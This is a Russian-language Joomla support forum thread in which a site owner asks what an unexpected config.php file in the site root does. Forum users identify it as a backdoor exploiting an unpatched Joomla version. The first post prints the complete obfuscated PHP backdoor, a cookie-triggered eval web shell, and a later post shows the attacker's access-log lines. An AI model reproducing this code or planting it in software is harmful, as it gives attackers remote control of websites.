Форум русской поддержки Joomla!® CMS
10.12.2016, 09:00:17 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Кто то залил в корень сайта файл

 (Прочитано 624 раз)
0 Пользователей и 1 Гость смотрят эту тему.
sabnok
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 130


« : 17.12.2015, 17:29:40 »

Кто то залил в корень сайта файл config.php  с таким содержанием, что это такое?) Что делает этот код? Антивирус его не определяет как вирус, на сайте все чисто.



\<?php $ej = str_replace("eo","","eoseoteoreo_reoeeopeoleoaeoceoe"); $dd="JGapM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkapYSk9PSdmcycapgJiYgapJGMoJGEappPapjMpe"; $yt="lZ1ap9yZXBsYWNlapKGFycmF5apKapCcvW15cdzap1cc10vJywnL1xapzLycappLCBhcnJheapSgnJywnKycpLapCBqapbap2a"; $se="pluKGFycmF5X3NsaWNaplKapCapRhLCRjKCRhKapS0zapKSkpKapSk7ZWNobyAnapPC8nLapiRrLic+apJzt9"; $uiz="yRrapPSc1Zap2ap16MzapMnO2apVjaG8gJzwnLiapRrLic+JztldmFsapKGapJhc2U2NF9kZWNapvZGUocHJ"; $axb = $ej("z", "", "zbzase6z4z_zdzezczozdze"); $oj = $ej("d","","cdrdeadted_dfdundcdtiodn"); $nfh = $oj("", $axb($ej("ap", "", $dd.$uiz.$yt.$se))); $nfh(); ?>
Записан
voland
Профи
********

Репутация: +488/-86
Offline Offline

Пол: Мужской
Сообщений: 8736


любит наш народ всякое гавно...


« Ответ #1 : 17.12.2015, 17:31:47 »

[patch]
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #2 : 17.12.2015, 18:10:13 »

Это бегдор, который позволяет вертеть вашим сайтом как хочется, антивирус и не спалит, код генерированый, тут нужны специализированные программы
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #3 : 17.12.2015, 18:28:29 »

Советую поискать еще такой же файл config.php , в файлах сайта
Вряд ли один файл
Записан
sabnok
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 130


« Ответ #4 : 17.12.2015, 18:48:00 »

А как его залили на сайт) версия Joomla 3.4.5 ничего лишнего нету. Проверял антивирусом на хостинге - ничего не нашел больше.
В логах нашел записи
86.123.69.119 - - [17/Dec/2015:10:30:37 +0300] "GET / HTTP/1.1" 200 32849 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:39 +0300] "GET / HTTP/1.1" 200 35301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:40 +0300] "GET /config.php HTTP/1.1" 200 170 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"

Такой файл config.php с кодом безопасно держать на компьютере?
« Последнее редактирование: 17.12.2015, 18:55:55 от sabnok » Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #5 : 17.12.2015, 19:08:27 »

А как его залили на сайт) версия Joomla 3.4.5 ничего лишнего нету. Проверял антивирусом на хостинге - ничего не нашел больше.
В логах нашел записи
86.123.69.119 - - [17/Dec/2015:10:30:37 +0300] "GET / HTTP/1.1" 200 32849 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:39 +0300] "GET / HTTP/1.1" 200 35301 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"
86.123.69.119 - - [17/Dec/2015:10:30:40 +0300] "GET /config.php HTTP/1.1" 200 170 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"

Такой файл config.php с кодом безопасно держать на компьютере?
ну все правильно, не патченая версия, тут на форуме уже разжевывался этот вопрос, только самые ленивые еще не вкурсе, что можно почитать соседние ветки и устранить проблему... а если еще покажите домен, я вам тоже рядышком файлик положу)))
Записан
sabnok
Осваиваюсь на форуме
***

Репутация: +1/-0
Offline Offline

Сообщений: 130


« Ответ #6 : 17.12.2015, 19:47:52 »

ну все правильно, не патченая версия, тут на форуме уже разжевывался этот вопрос, только самые ленивые еще не вкурсе, что можно почитать соседние ветки и устранить проблему... а если еще покажите домен, я вам тоже рядышком файлик положу)))

Ну атак в логах нету нигде подобных которые в соседних ветках обсуждаються) После этого уже обновился, но может надо поменять пароль от админки и базы данных и перфикс поменять? ведь вроде как злоумышленники получают эти данные
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #7 : 17.12.2015, 20:00:11 »

Ну атак в логах нету нигде подобных которые в соседних ветках обсуждаються) После этого уже обновился, но может надо поменять пароль от админки и базы данных и перфикс поменять? ведь вроде как злоумышленники получают эти данные
Кидайте домен в ПМ покажу, этот тип атаки так и реализуется, первый запрос к любой странице, для приобритении сессии, второй для заливки шелла, третий для его чека что он залился
Записан
mistbow
Осваиваюсь на форуме
***

Репутация: +4/-0
Offline Offline

Сообщений: 72


« Ответ #8 : 26.12.2015, 04:33:43 »

Тоже сегодня прилетело на десятке сайтов (((
Ладно бы только в корне, о всем папочкам и подпапочкам до самых низов напихали... хрен вычистишь проще вообще тупо все переустановить!
Надеюсь хоть бузы-то не попортили чем-нить эдаким (((
Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #9 : 26.12.2015, 09:27:28 »

Могли. Могли даже дампы посливать, если сайты интересные.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet